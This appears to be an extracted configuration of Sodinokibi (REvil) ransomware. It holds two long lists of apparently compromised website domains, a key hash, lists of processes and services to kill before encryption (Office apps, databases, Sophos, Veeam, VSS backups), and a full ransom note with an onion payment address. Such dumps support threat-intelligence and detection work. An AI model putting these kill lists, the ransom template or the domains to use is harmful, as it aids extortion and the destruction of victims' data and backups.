turkcaparbariatrics.com
anteniti.com
conasmanagement.de
tenacitytenfold.com
fitnessbazaar.com
antiaginghealthbenefits.com
sexandfessenjoon.wordpress.com
winrace.no
berlin-bamboo-bikes.org
ccpbroadband.com
stoeberstuuv.de
dr-seleznev.com
thomas-hospital.de
braffinjurylawfirm.com
licor43.de
igrealestate.com
americafirstcommittee.org
serce.info.pl
logopaedie-blomberg.de
pierrehale.com
abogadosadomicilio.es
myhostcloud.com
sachnendoc.com
cwsitservices.co.uk
surespark.org.uk
bogdanpeptine.ro
hypozentrum.com
tulsawaterheaterinstallation.com
alsace-first.com
mikeramirezcpa.com
austinlchurch.com
vermoote.de
urmasiimariiuniri.ro
deprobatehelp.com
sojamindbody.com
321play.com.hk
autodemontagenijmegen.nl
besttechie.com
sweering.fr
newstap.com.ng
profectis.de
gporf.fr
punchbaby.com
vyhino-zhulebino-24.ru
vetapharma.fr
vloeren-nu.nl
zewatchers.com
ruralarcoiris.com
mooglee.com
pmcimpact.com
gaiam.nl
alvinschwartz.wordpress.com
kikedeoliveira.com
schutting-info.nl
sportiomsportfondsen.nl
gamesboard.info
waermetauscher-berechnen.de
mytechnoway.com
people-biz.com
jandaonline.com
julis-lsa.de
aunexis.ch
ilive.lt
dubnew.com
dnepr-beskid.com.ua
dramagickcom.wordpress.com
backstreetpub.com
aurum-juweliere.de
devlaur.com
healthyyworkout.com
employeesurveys.com
epwritescom.wordpress.com
adoptioperheet.fi
fax-payday-loans.com
havecamerawilltravel2017.wordpress.com
airconditioning-waalwijk.nl
pferdebiester.de
lbcframingelectrical.com
tuuliautio.fi
walter-lemm.de
advokathuset.dk
petnest.ir
marietteaernoudts.nl
loprus.pl
edelman.jp
softsproductkey.com
hardinggroup.com
nativeformulas.com
shhealthlaw.com
mountaintoptinyhomes.com
pcprofessor.com
planchaavapor.net
latestmodsapks.com
corona-handles.com
oldschoolfun.net
songunceliptv.com
eglectonk.online
ilso.net
teresianmedia.org
hatech.io
intecwi.com
darnallwellbeing.org.uk
tongdaifpthaiphong.net
vdberg-autoimport.nl
biapi-coaching.fr
dushka.ua
jyzdesign.com
seevilla-dr-sturm.at
ilcdover.com
bockamp.com
qualitaetstag.de
degroenetunnel.com
maasreusel.nl
waywithwords.net
rosavalamedahr.com
musictreehouse.net
123vrachi.ru
globedivers.wordpress.com
restaurantesszimmer.de
blog.solutionsarchitect.guru
polzine.net
tecnojobsnet.com
clos-galant.com
carolinepenn.com
raschlosser.de
rostoncastings.co.uk
seagatesthreecharters.com
romeguidedvisit.com
ligiercenter-sachsen.de
schoellhammer.com
oncarrot.com
navyfederalautooverseas.com
botanicinnovations.com
leda-ukraine.com.ua
sotsioloogia.ee
anthonystreetrimming.com
siliconbeach-realestate.com
vihannesporssi.fi
insigniapmg.com
steampluscarpetandfloors.com
kunze-immobilien.de
ouryoungminds.wordpress.com
coastalbridgeadvisors.com
falcou.fr
body-guards.it
sanyue119.com
rhinosfootballacademy.com
facettenreich27.de
entopic.com
grelot-home.com
nancy-informatique.fr
justinvieira.com
offroadbeasts.com
denifl-consulting.at
fotoideaymedia.es
purposeadvisorsolutions.com
bricotienda.com
perbudget.com
ledmes.ru
westdeptfordbuyrite.com
zervicethai.co.th
ulyssemarketing.com
securityfmm.com
charlottepoudroux-photographie.fr
promalaga.es
allamatberedare.se
greenfieldoptimaldentalcare.com
allentownpapershow.com
suncrestcabinets.ca
embracinghiscall.com
southeasternacademyofprosthodontics.org
pt-arnold.de
physiofischer.de
woodworkersolution.com
kamahouse.net
cafemattmeera.com
memaag.com
xn--rumung-bua.online
first-2-aid-u.com
abuelos.com
sipstroysochi.ru
ino-professional.ru
spectrmash.ru
xltyu.com
radaradvies.nl
boisehosting.net
gmto.fr
kenhnoithatgo.com
catholicmusicfest.com
candyhouseusa.com
bimnapratica.com
crediacces.com
lucidinvestbank.com
hmsdanmark.dk
assurancesalextrespaille.fr
bierensgebakkramen.nl
abogados-en-alicante.es
leeuwardenstudentcity.nl
jenniferandersonwriter.com
takeflat.com
4youbeautysalon.com
webmaster-peloton.com
houseofplus.com
calxplus.eu
wsoil.com.sg
fitnessingbyjessica.com
stampagrafica.es
lionware.de
apprendrelaudit.com
trulynolen.co.uk
ontrailsandboulevards.com
iwr.nl
daklesa.de
esope-formation.fr
ravensnesthomegoods.com
celeclub.org
simoneblum.de
echtveilig.nl
thewellnessmimi.com
ftlc.es
simplyblessedbykeepingitreal.com
troegs.com
behavioralmedicinespecialists.com
dutchbrewingcoffee.com
coffreo.biz
sla-paris.com
id-vet.com
argos.wityu.fund
sairaku.net
reddysbakery.com
tux-espacios.com
devok.info
spd-ehningen.de
shadebarandgrillorlando.com
urist-bogatyr.ru
katketytaanet.fi
johnsonfamilyfarmblog.wordpress.com
biortaggivaldelsa.com
love30-chanko.com
trackyourconstruction.com
thenewrejuveme.com
mdacares.com
polymedia.dk
greenpark.ch
x-ray.ca
maxadams.london
cimanchesterescorts.co.uk
bestbet.com
buroludo.nl
mardenherefordshire-pc.gov.uk
hairnetty.wordpress.com
bouquet-de-roses.com
actecfoundation.org
strategicstatements.com
fotoscondron.com
iwelt.de
associacioesportivapolitg.cat
international-sound-awards.com
smhydro.com.pl
harveybp.com
cranleighscoutgroup.org
smartypractice.com
foretprivee.ca
vibethink.net
cuppacap.com
makeitcount.at
smejump.co.th
artotelamsterdam.com
maineemploymentlawyerblog.com
lecantou-coworking.com
lloydconstruction.com
dublikator.com
corola.es
elpa.se
yourobgyn.net
dekkinngay.com
teczowadolina.bytom.pl
imperfectstore.com
shiresresidential.com
xlarge.at
trapiantofue.it
journeybacktolife.com
penco.ie
miraclediet.fun
deschl.net
arteservicefabbro.com
triggi.de
fairfriends18.de
jacquin-maquettes.com
architekturbuero-wagner.net
aminaboutique247.com
faronics.com
i-trust.dk
pasvenska.se
tinkoff-mobayl.ru
delawarecorporatelaw.com
mediaacademy-iraq.org
friendsandbrgrs.com
ncs-graphic-studio.com
kedak.de
apolomarcas.com
lenreactiv-shop.ru
girlillamarketing.com
panelsandwichmadrid.es
bodyfulls.com
transliminaltribe.wordpress.com
muamuadolls.com
nijaplay.com
lichencafe.com
theadventureedge.com
jameskibbie.com
baronloan.org
ohidesign.com
flexicloud.hk
ikads.org
binder-buerotechnik.at
zflas.com
crowcanyon.com
tandartspraktijkhartjegroningen.nl
malychanieruchomoscipremium.com
modelmaking.nl
withahmed.com
c2e-poitiers.com
ceid.info.tr
35-40konkatsu.net
maureenbreezedancetheater.org
wraithco.com
xn--fnsterputssollentuna-39b.se
servicegsm.net
micahkoleoso.de
pivoineetc.fr
yamalevents.com
beautychance.se
theduke.de
elimchan.com
spinheal.ru
montrium.com
blgr.be
systemate.dk
mbfagency.com
ai-spt.jp
retroearthstudio.com
instatron.net
dw-css.de
henricekupper.com
dutchcoder.nl
educar.org
eadsmurraypugh.com
bhwlawfirm.com
nmiec.com
xn--thucmctc-13a1357egba.com
nhadatcanho247.com
evangelische-pfarrgemeinde-tuniberg.de
kostenlose-webcams.com
team-montage.dk
herbayupro.com
nosuchthingasgovernment.com
stacyloeb.com
transportesycementoshidalgo.es
real-estate-experts.com
linnankellari.fi
xoabigail.com
theclubms.com
nakupunafoundation.org
mousepad-direkt.de
theshungiteexperience.com.au
mrtour.site
maratonaclubedeportugal.com
eaglemeetstiger.de
whittier5k.com
trystana.com
rocketccw.com
imadarchid.com
satyayoga.de
modamilyon.com
mastertechengineering.com
liliesandbeauties.org
onlyresultsmarketing.com
leoben.at
fensterbau-ziegler.de
aselbermachen.com
thee.network
ateliergamila.com
hokagestore.com
caffeinternet.it
stormwall.se
copystar.co.uk
microcirc.net
1team.es
calabasasdigest.com
drfoyle.com
mooshine.com
praxis-management-plus.de
boosthybrid.com.au
lachofikschiet.nl
baylegacy.com
baptisttabernacle.com
labobit.it
mountsoul.de
filmstreamingvfcomplet.be
yassir.pro
strandcampingdoonbeg.com
platformier.com
bayoga.co.uk
otsu-bon.com
caribbeansunpoker.com
marcuswhitten.site
precisionbevel.com
allfortheloveofyou.com
stoneys.ch
luckypatcher-apkz.com
deepsouthclothingcompany.com
crowd-patch.co.uk
tradiematepro.com.au
rozemondcoaching.nl
geisterradler.de
ki-lowroermond.nl
birnam-wood.com
klimt2012.info
evergreen-fishing.com
gadgetedges.com
smokeysstoves.com
sw1m.ru
quickyfunds.com
chefdays.de
tstaffing.nl
danskretursystem.dk
hebkft.hu
completeweddingkansas.com
artallnightdc.com
hairstylesnow.site
polychromelabs.com
noesis.tech
craigmccabe.fun
sinal.org
xn--fn-kka.no
cnoia.org
kath-kirche-gera.de
lapmangfpt.info.vn
michaelsmeriglioracing.com
upmrkt.co
huesges-gruppe.de
markelbroch.com
digivod.de
bunburyfreightservices.com.au
mbxvii.com
despedidascostablanca.es
cortec-neuro.com
pocket-opera.de
socstrp.org
berliner-versicherungsvergleich.de
rerekatu.com
saxtec.com
karacaoglu.nl
selfoutlet.com
ivivo.es
art2gointerieurprojecten.nl
smogathon.com
enovos.de
sanaia.com
agence-chocolat-noir.com
lightair.com
homesdollar.com
forestlakeuca.org.au
tampaallen.com
milltimber.aberdeen.sch.uk
tonelektro.nl
classycurtainsltd.co.uk
slimani.net
madinblack.com
slashdb.com
seitzdruck.com
financescorecard.com
mediaclan.info
solinegraphic.com
wmiadmin.com
edv-live.de
gemeentehetkompas.nl
kosterra.com
destinationclients.fr
parks-nuernberg.de
slimidealherbal.com
pmc-services.de
zweerscreatives.nl
jolly-events.com
agence-referencement-naturel-geneve.net
tanciu.com
fiscalsort.com
pickanose.com
wellplast.se
lubetkinmediacompanies.com
jerling.de
tarotdeseidel.com
aarvorg.com
wolf-glas-und-kunst.de
dsl-ip.de
patrickfoundation.net
quemargrasa.net
365questions.org
plantag.de
balticdentists.com
psa-sec.de
officehymy.com
stingraybeach.com
kaotikkustomz.com
torgbodenbollnas.se
limassoldriving.com
ivfminiua.com
starsarecircular.org
fitovitaforum.com
pomodori-pizzeria.de
milestoneshows.com
heliomotion.com
hihaho.com
bordercollie-nim.nl
craftleathermnl.com
solhaug.tk
colorofhorses.com
bouncingbonanza.com
sobreholanda.com
lukeshepley.wordpress.com
twohourswithlena.wordpress.com
summitmarketingstrategies.com
bingonearme.org
alten-mebel63.ru
schraven.de
handi-jack-llc.com
huissier-creteil.com
webhostingsrbija.rs
drugdevice.org
denovofoodsgroup.com
freie-baugutachterpraxis.de
abitur-undwieweiter.de
the-domain-trader.com
ymca-cw.org.uk
insidegarage.pl
broseller.com
centromarysalud.com
hotelzentral.at
rebeccarisher.com
vanswigchemdesign.com
nuzech.com
smessier.com
nachhilfe-unterricht.com
nicoleaeschbachorg.wordpress.com
amylendscrestview.com
iyengaryogacharlotte.com
bafuncs.org
chatizel-paysage.fr
irinaverwer.com
pixelarttees.com
jbbjw.com
bodyforwife.com
ncuccr.org
tips.technology
manijaipur.com
talentwunder.com
antenanavi.com
corendonhotels.com
joseconstela.com
rota-installations.co.uk
iqbalscientific.com
spacecitysisters.org
analiticapublica.es
bauertree.com
streamerzradio1.site
partnertaxi.sk
corelifenutrition.com
portoesdofarrobo.com
pubweb.carnet.hr
resortmtn.com
hexcreatives.co
jadwalbolanet.info
mmgdouai.fr
philippedebroca.com
naswrrg.org
diversiapsicologia.es
peterstrobos.com
jvanvlietdichter.nl
carlosja.com
div-vertriebsforschung.de
campusoutreach.org
thedresserie.com
live-con-arte.de
bsaship.com
ralister.co.uk
boompinoy.com
milsing.hr
hashkasolutindo.com
kampotpepper.gives
maryloutaylor.com
norpol-yachting.com
joyeriaorindia.com
myzk.site
bargningharnosand.se
plv.media
marathonerpaolo.com
adultgamezone.com
symphonyenvironmental.com
kojima-shihou.com
simulatebrain.com
sofavietxinh.com
whyinterestingly.ru
castillobalduz.es
creative-waves.co.uk
kuntokeskusrok.fi
bildungsunderlebnis.haus
extensionmaison.info
tomoiyuma.com
makeurvoiceheard.com
ecopro-kanto.com
tomaso.gr
lusak.at
themadbotter.com
tanzprojekt.com
levdittliv.se
christinarebuffetcourses.com
myteamgenius.com
appsformacpc.com
12starhd.online
onlybacklink.com
richard-felix.co.uk
you-bysia.com.au
dontpassthepepper.com
bigasgrup.com
blewback.com
goodgirlrecovery.com
hellohope.com
y-archive.com
burkert-ideenreich.de
shiftinspiration.com
praxis-foerderdiagnostik.de
operaslovakia.sk
skanah.com
fizzl.ru
sporthamper.com
danholzmann.com
jorgobe.at
lefumetdesdombes.com
idemblogs.com
kissit.ca
darrenkeslerministries.com
liikelataamo.fi
nokesvilledentistry.com
ecpmedia.vn
www1.proresult.no
poultrypartners.nl
promesapuertorico.com
roadwarrior.app
lillegrandpalais.com
naturstein-hotte.de
artige.com
collaborativeclassroom.org
testzandbakmetmening.online
interactcenter.org
insp.bi
rieed.de
atozdistribution.co.uk
rushhourappliances.com
bigbaguettes.eu
baumkuchenexpo.jp
macabaneaupaysflechois.com
zieglerbrothers.de
admos-gleitlager.de
n1-headache.com
dareckleyministries.com
sabel-bf.com
101gowrie.com
live-your-life.jp
pridoxmaterieel.nl
thaysa.com
mank.de
marchand-sloboda.com
irishmachineryauctions.com
ianaswanson.com
proudground.org
sloverse.com
naturavetal.hr
femxarxa.cat
1kbk.com.ua
fibrofolliculoma.info
dirittosanitario.biz
mindpackstudios.com
forskolorna.org
highimpactoutdoors.net
4net.guru
carriagehousesalonvt.com
shonacox.com
DupontSellsHomes.com
smalltownideamill.wordpress.com
longislandelderlaw.com
kmbshipping.co.uk
visiativ-industry.fr
lapinlviasennus.fi
mapawood.com
zonamovie21.net
better.town
pcp-nc.com
tanzschule-kieber.de
comarenterprises.com
d1franchise.com
stallbyggen.se
remcakram.com
danubecloud.com
bookspeopleplaces.com
parking.netgateway.eu
nacktfalter.de
parkstreetauto.net
urclan.net
toponlinecasinosuk.co.uk
mooreslawngarden.com
controldekk.com
funjose.org.gt
mrsplans.net
mymoneyforex.com
geoffreymeuli.com
aakritpatel.com
imaginado.de
bastutunnan.se
erstatningsadvokaterne.dk
drinkseed.com
mrsfieldskc.com
ahouseforlease.com
new.devon.gov.uk
alysonhoward.com
coding-machine.com
kariokids.com
asgestion.com
unetica.fr
drnice.de
thedad.com
tennisclubetten.nl
siluet-decor.ru
schoolofpassivewealth.com
atmos-show.com
marketingsulweb.com
rksbusiness.com
gratispresent.se
lynsayshepherd.co.uk
mirkoreisser.de
cityorchardhtx.com
sterlingessay.com
lebellevue.fr
zenderthelender.com
wurmpower.at
anybookreader.de
oslomf.no
wari.com.pe
camsadviser.com
vibehouse.rw
vannesteconstruct.be
deoudedorpskernnoordwijk.nl
cuspdental.com
citymax-cr.com
hoteledenpadova.it
paymybill.guru
osterberg.fi
compliancesolutionsstrategies.com
wasmachtmeinfonds.at
carrybrands.nl
dlc.berlin
kafu.ch
bristolaeroclub.co.uk
dpo-as-a-service.com
sahalstore.com
luxurytv.jp
delchacay.com.ar
familypark40.com
saka.gr
unim.su
seminoc.com
ventti.com.ar
brevitempore.net
xtptrack.com
ftf.or.at
happyeasterimages.org
knowledgemuseumbd.com
euro-trend.pl
campus2day.de
sandd.nl
ditog.fr
nestor-swiss.ch
expandet.dk
juneauopioidworkgroup.org
conexa4papers.trade
importardechina.info
humanityplus.org
figura.team
pay4essays.net
durganews.com
architecturalfiberglass.org
mercantedifiori.com
hushavefritid.dk
milanonotai.it
slwgs.org
koko-nora.dk
zimmerei-fl.de
galleryartfair.com
ziegler-praezisionsteile.de
roygolden.com
woodleyacademy.org
pasivect.co.uk
abogadosaccidentetraficosevilla.es
gasbarre.com
sportverein-tambach.de
d2marketing.co.uk
directwindowco.com
bridgeloanslenders.com
plotlinecreative.com
dr-pipi.de
tophumanservicescourses.com
kojinsaisei.info
mylolis.com
mediaplayertest.net
garage-lecompte-rouen.fr
smithmediastrategies.com
ogdenvision.com
creamery201.com
odiclinic.org
piajeppesen.dk
aprepol.com
slupetzky.at
merzi.info
jiloc.com
boulderwelt-muenchen-west.de
helikoptervluchtnewyork.nl
oneplusresource.org
jobmap.at
cursoporcelanatoliquido.online
socialonemedia.com
stopilhan.com
outcomeisincome.com
rafaut.com
liveottelut.com
accountancywijchen.nl
herbstfeststaefa.ch
comparatif-lave-linge.fr
haar-spange.com
krcove-zily.eu
chaotrang.com
stoeferlehalle.de
cerebralforce.net
gw2guilds.org
waveneyrivercentre.co.uk
wychowanieprzedszkolne.pl
parebrise-tla.fr
syndikat-asphaltfieber.de
baustb.de
coding-marking.com
renergysolution.com
katiekerr.co.uk
fayrecreations.com
synlab.lt
eraorastudio.com
vesinhnha.com.vn
allure-cosmetics.at
edgewoodestates.org
moveonnews.com
sauschneider.info
ctrler.cn
fundaciongregal.org
antonmack.de
advizewealth.com
plastidip.com.ar
spylista.com
yousay.site
neuschelectrical.co.za
stupbratt.no
narcert.com
tigsltd.com
asiluxury.com
gonzalezfornes.es
shsthepapercut.com
krlosdavid.com
stemplusacademy.com
easytrans.com.au
answerstest.ru
bptdmaluku.com
kirkepartner.dk
humancondition.com
revezlimage.com
webcodingstudio.com
cactusthebrand.com
toreria.es
simpliza.com
jusibe.com
iyahayki.nl
haremnick.com
helenekowalsky.com
paulisdogshop.de
koken-voor-baby.nl
blood-sports.net
oneheartwarriors.at
mariposapropaneaz.com
ecoledansemulhouse.fr
werkkring.nl
chrissieperry.com
qualitus.com
prochain-voyage.net
bloggyboulga.net
deltacleta.cat
pelorus.group
testcoreprohealthuk.com
kamienny-dywan24.pl
associationanalytics.com
pointos.com
hhcourier.com
freie-gewerkschaften.de
em-gmbh.ch
body-armour.online
monark.com
jakekozmor.com
2ekeus.nl
gantungankunciakrilikbandung.com
uimaan.fi
foryourhealth.live
bundabergeyeclinic.com.au
courteney-cox.net
senson.fi
all-turtles.com
kalkulator-oszczednosci.pl
jsfg.com
coursio.com
phantastyk.com
hvccfloorcare.com
argenblogs.com.ar
iviaggisonciliegie.it
vietlawconsultancy.com
bee4win.com
vitavia.lt
dr-tremel-rednitzhembach.de
kevinjodea.com
verbisonline.com
teknoz.net
seproc.hn
igorbarbosa.com
thefixhut.com
naturalrapids.com
hkr-reise.de
olejack.ru
lmtprovisions.com
latribuessentielle.com
leather-factory.co.jp
boldcitydowntown.com
cheminpsy.fr
podsosnami.ru
mrxermon.de
pawsuppetlovers.com
manutouchmassage.com
lykkeliv.net
datacenters-in-europe.com
mezhdu-delom.ru
aco-media.nl
centrospgolega.com
wacochamber.com
videomarketing.pro
porno-gringo.com
andersongilmour.co.uk
kisplanning.com.au
gastsicht.de
web.ion.ag
rollingrockcolumbia.com
cirugiauretra.es
charlesreger.com
mdk-mediadesign.de
personalenhancementcenter.com
zimmerei-deboer.de
almosthomedogrescue.dog
celularity.com
consultaractadenacimiento.com
samnewbyjax.com
spargel-kochen.de
beyondmarcomdotcom.wordpress.com
minipara.com
galserwis.pl
verytycs.com
effortlesspromo.com
bradynursery.com
villa-marrakesch.de
commercialboatbuilding.com
presseclub-magdeburg.de
norovirus-ratgeber.de
acomprarseguidores.com
kindersitze-vergleich.de
daniel-akermann-architektur-und-planung.ch
ampisolabergeggi.it
igfap.com
executiveairllc.com
bbsmobler.se
sagadc.com
ostheimer.at
crosspointefellowship.church
farhaani.com
parkcf.nl
tsklogistik.eu
devstyle.org
finde-deine-marke.de
makeflowers.ru
modestmanagement.com
icpcnj.org
littlebird.salon
innote.fi
oceanastudios.com
opatrovanie-ako.sk
worldhealthbasicinfo.com
groupe-frayssinet.fr
ungsvenskarna.se
wien-mitte.co.at
pv-design.de
puertamatic.es
kao.at
solerluethi-allart.ch
vitalyscenter.es
blogdecachorros.com
nataschawessels.com
ladelirante.fr
dubscollective.com
mepavex.nl
scenepublique.net
-
net
true
-
pid
$2a$10$nWPIRSot/CckTPp00tnXQOFn2NS9abxBEdAbLQPH5CRiCW8.CQOuG
-
prc
powerpnt
winword
ocssd
onenote
sqbcoreservice
encsvc
outlook
oracle
dbsnmp
xfssvccon
agntsvc
dbeng50
visio
thebat
mydesktopservice
thunderbird
msaccess
mydesktopqos
steam
sql
infopath
firefox
tbirdconfig
wordpad
isqlplussvc
ocautoupds
mspub
synctime
ocomm
excel
-
ransom_oneliner
All of your files are encrypted! Find {EXT}-readme.txt and follow instuctions
-
ransom_template
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension {EXT}. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/{UID} 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/{UID} Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: {KEY} ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
-
sub
3382
-
svc
sophos
sql
svc$
memtas
mepocs
veeam
backup
vss
Extracted
sodinokibi
48
2839
fotoeditores.com
lisa-poncon.fr
loysonbryan.com
levencovka.ru
dierenambulancealkmaar.nl
apogeeconseils.fr
xn--ziinoapte-6ld.ro
mrkluttz.com
larchwoodmarketing.com
cymru.futbol
afbudsrejserallinclusive.dk
towelroot.co
frimec-international.es
fluzfluzrewards.com
liepertgrafikweb.at
sppdstats.com
happylublog.wordpress.com
kelsigordon.com
biodentify.ai
bratek-immobilien.de
artvark.nl
oraweb.net
fann.ru
spacebel.be
signededenroth.dk
distrifresh.com
stringnosis.academy
chinowarehousespace.com
lexced.com
ludoil.it
clemenfoto.dk
teamsegeln.ch
activeterroristwarningcompany.com
slideevents.be
koncept-m.ru
hensleymarketing.com
ygallerysalonsoho.com:443
alltagsrassismus-entknoten.de
stage-infirmier.fr
lunoluno.com
medicalsupportco.com
saint-malo-developpement.fr
oro.ae
michal-s.co.il
strauchs-wanderlust.info
purepreprod4.com
johnkoen.com
radishallgood.com
welovecustomers.fr
gurutechnologies.net
parseport.com
angelsmirrorus.com
latableacrepes-meaux.fr
greatofficespaces.net
theintellect.edu.pk
kvetymichalovce.sk
pankiss.ru
ownidentity.com
rentingwell.com
christianscholz.de
janasfokus.com
keyboardjournal.com
heimdalbygg.no
malevannye.ru
zaczytana.com
ideamode.com
yuanshenghotel.com
vdolg24.online
singletonfinancial.com
alharsunindo.com
jax-interim-and-projectmanagement.com
charlesfrancis.photos
quitescorting.com
mediabolmong.com
elliemaccreative.wordpress.com
teethinadaydentalimplants.com
encounter-p.net
line-x.co.uk
k-v-f.de
kartuindonesia.com
neolaiamedispa.com
letsstopsmoking.co.uk
liverpoolabudhabi.ae
awaitspain.com
bodymindchallenger.com
tilldeeke.de
campinglaforetdetesse.com
vitoriaecoturismo.com.br
renehartman.nl
cap29010.it
aceroprime.com
interlinkone.com
stoneridgemontessori.com
from02pro.com
gosouldeep.com
kerstliedjeszingen.nl
saberconcrete.com
littlesaints.academy
kellengatton.com
nicksrock.com
triavlete.com
kryddersnapsen.dk
publicompserver.de
mayprogulka.ru
hvitfeldt.dk
pokemonturkiye.com
iactechnologies.net
acb-gruppe.ch
phoenixcrane.com
maxcube24.com.ua
successcolony.com.ng
sshomme.com
cookinn.nl
annenymus.com
fidelitytitleoregon.com
parisschool.ru
nieuwsindeklas.be
advancedeyecare.com
premiumweb.com.ua:443
leatherjees.com
sytzedevries.com
diverfiestas.com.es
xtensifi.com
richardmaybury.co.uk
makingmillionaires.net
hartofurniture.com
texanscan.org
frameshift.it
powershell.su
babysitting-hk.helpergo.co
bellesiniacademy.org
nepal-pictures.com
airserviceunlimited.com
stralsund-ansichten.de
nepressurecleaning.com
acornishstudio.co.uk
teutoradio.de
endlessrealms.net
skoczynski.eu
bcmets.info
altitudeboise.com
jefersonalessandro.com
xn--billigafrgpatroner-stb.se
smarttourism.academy
finnergo.eu
supercarhire.co.uk
profibersan.com
peninggibadan.co.id
muni.pe
the3-week-diet.net
jayfurnitureco.com
iron-mine.ru
business-basic.de
mikegoodfellow.co.uk
globalskills.pt
envomask.com
cormanmarketing.com
justaroundthecornerpetsit.com
gbk-tp1.de
kafkacare.com
claudiakilian.de
dentourage.com
kompresory-opravy.com
vitormmcosta.com
aidanpublishing.co.uk
drnelsonpediatrics.com
luvinsburger.fr
scietech.academy
benchbiz.com
motocrosshideout.com
slotspinner.com
midwestschool.org
mazift.dk
hotjapaneselesbian.com
denhaagfoodie.nl
fazagostar.co
solidhosting.nl
nuohous.com
glas-kuck.de
rsidesigns.com
richardiv.com
agenceassemble.fr
goeppinger-teppichreinigung.de
mediogiro.com.ar
hinotruckwreckers.com.au
agrifarm.dk
innovationgames-brabant.nl
greeneyetattoo.com
arthakapitalforvaltning.dk
look.academy
bonitabeachassociation.com
kiraribeaute-nani.com
tetameble.pl
plbinsurance.com
spartamovers.com
harleystreetspineclinic.com
bg.szczecin.pl
alisodentalcare.com
malzomattalar.com
espaciopolitica.com
entdoctor-durban.com
unexplored.gr
log-barn.co.uk
galaniuklaw.com
voetbalhoogeveen.nl
onesynergyinternational.com
kdbrh.com
nginx.com
oscommunity.de
rishigangoly.com
jakubrybak.com
pxsrl.it
flossmoordental.com
metroton.ru
thesilkroadny.com
yourcosmicbeing.com
silverbird.dk
groovedealers.ru
housesofwa.com
descargandoprogramas.com
atelierkomon.com
khtrx.com
cainlaw-okc.com
internalresults.com
thepixelfairy.com
speakaudible.com
brunoimmobilier.com
eyedoctordallas.com
janellrardon.com
ilovefullcircle.com
o2o-academy.com
wasnederland.nl
cac2040.com
reygroup.pt
bluetenreich-brilon.de
cc-experts.de
boomerslivinglively.com
peppergreenfarmcatering.com.au
lapponiasafaris.com
hostingbangladesh.net
stagefxinc.com
ninjaki.com
alwaysdc.com
sealgrinderpt.com
paradigmlandscape.com
innervisions-id.com
kausette.com
leloupblanc.gr
relevantonline.eu
collegetennis.info
axisoflove.org:443
secrets-clubs.co.uk
lumturo.academy
klapanvent.ru
renderbox.ch
creohn.de
ayudaespiritualtamara.com
matthieupetel.fr
devplus.be
therapybusinessacademy.com
sarahspics.co.uk
geitoniatonaggelon.gr
druktemakersheerenveen.nl
ntinasfiloxenia.gr
leijstrom.com
qwikcoach.com
stathmoulis.gr
gsconcretecoatings.com
brisbaneosteopathic.com.au
valiant-voice.com
elex.is
subyard.com
eurethicsport.eu
zwemofficial.nl
morgansconsult.com
cascinarosa33.it
scotlandsroute66.co.uk
bakingismyyoga.com
tbalp.co.uk
soncini.ch
ledyoucan.com
bychowo.pl
pinthelook.com
hotelturbo.de
veggienessa.com
marcandy.com
pedmanson.com
aberdeenartwalk.org
pisofare.co
chainofhopeeurope.eu
unboxtherapy.site
rossomattonecase.it
osn.ro
campusescalade.com
bajova.sk
bodet150ans.com
colored-shelves.com
kuriero.pro
phukienbepthanhdat.com
bilius.dk
amorbellezaysalud.com
physio-lang.de
opticahubertruiz.com
gavelmasters.com
lidkopingsnytt.nu
kickittickets.com
loparnille.se
dibli.store
vipcarrental.ae
leopoldineroux.com
orchardbrickwork.com
lyricalduniya.com
angeleyezstripclub.com
ncjc.ca
craftingalegacy.com
buonabitare.com
premier-iowa.com
autoteamlast.de
baumfinancialservices.com
drbenveniste.com
pubcon.com
ufovidmag.com
nxtstg.org
ikadomus.com
fotoslubna.com
hawthornsretirement.co.uk
stressreliefadvice.com
indiebizadvocates.org
otpusk.zp.ua
shortsalemap.com
zumrutkuyutemel.com
specialtyhomeservicesllc.com
uci-france.fr
mac-computer-support-hamburg.de
devus.de
advesa.com
111firstdelray.com
biblica.com
professionetata.com
lovetzuchia.com
lifeinbreaths.com
astrographic.com
metcalfe.ca
tothebackofthemoon.com
aslog.fr
lgiwines.com
fi-institutionalfunds.com
eventosvirtualesexitosos.com
mollymccarthydesign.com
epsondriversforwindows.com
jalkapuu.net
avtoboss163.ru:443
mgimalta.com
kamin-somnium.de
rizplakatjaya.com
geoweb.software
scentedlair.com
patassociation.com
auberives-sur-vareze.fr
amyandzac.com
modamarfil.com
laylavalentine.com
tzn.nu
kroophold-sjaelland.dk
parentsandkids.com
lashandbrowenvy.com
jlwilsonbooks.com
jobkiwi.com.ng
skyscanner.ro
toranjtuition.org
jaaphoekzema.nl
hostastay.com
donau-guides.eu
polynine.com
burg-zelem.de
barbaramcfadyenjewelry.com
louiedager.com
marmarabasin.com
egpu.fr
manzel.tn
verbouwingsdouche.nl
johnsonweekly.com
jonnyhooley.com
mercadodelrio.com
mneti.ru
airvapourbarrier.com
nrgvalue.com
trevi-vl.ru
cmascd.com
bluelakevision.com
aktivfriskcenter.se
ddmgen.com
wallflowersandrakes.com
triplettagaite.fr
concontactodirecto.com
smartworkplaza.com
forumsittard.nl
voice2biz.com
fysiotherapierijnmond.nl
mrcar.nl
hawaiisteelbuilding.com
hoteltantra.com
charlottelhanna.com
amelielecompte.wordpress.com
yournextshoes.com
mangimirossana.it
naukaip.ru
casinodepositors.com
campusce.com
forskolinslimeffect.net
thegrinningmanmusical.com
solutionshosting.co.uk
9nar.com
stabilisateur.fr
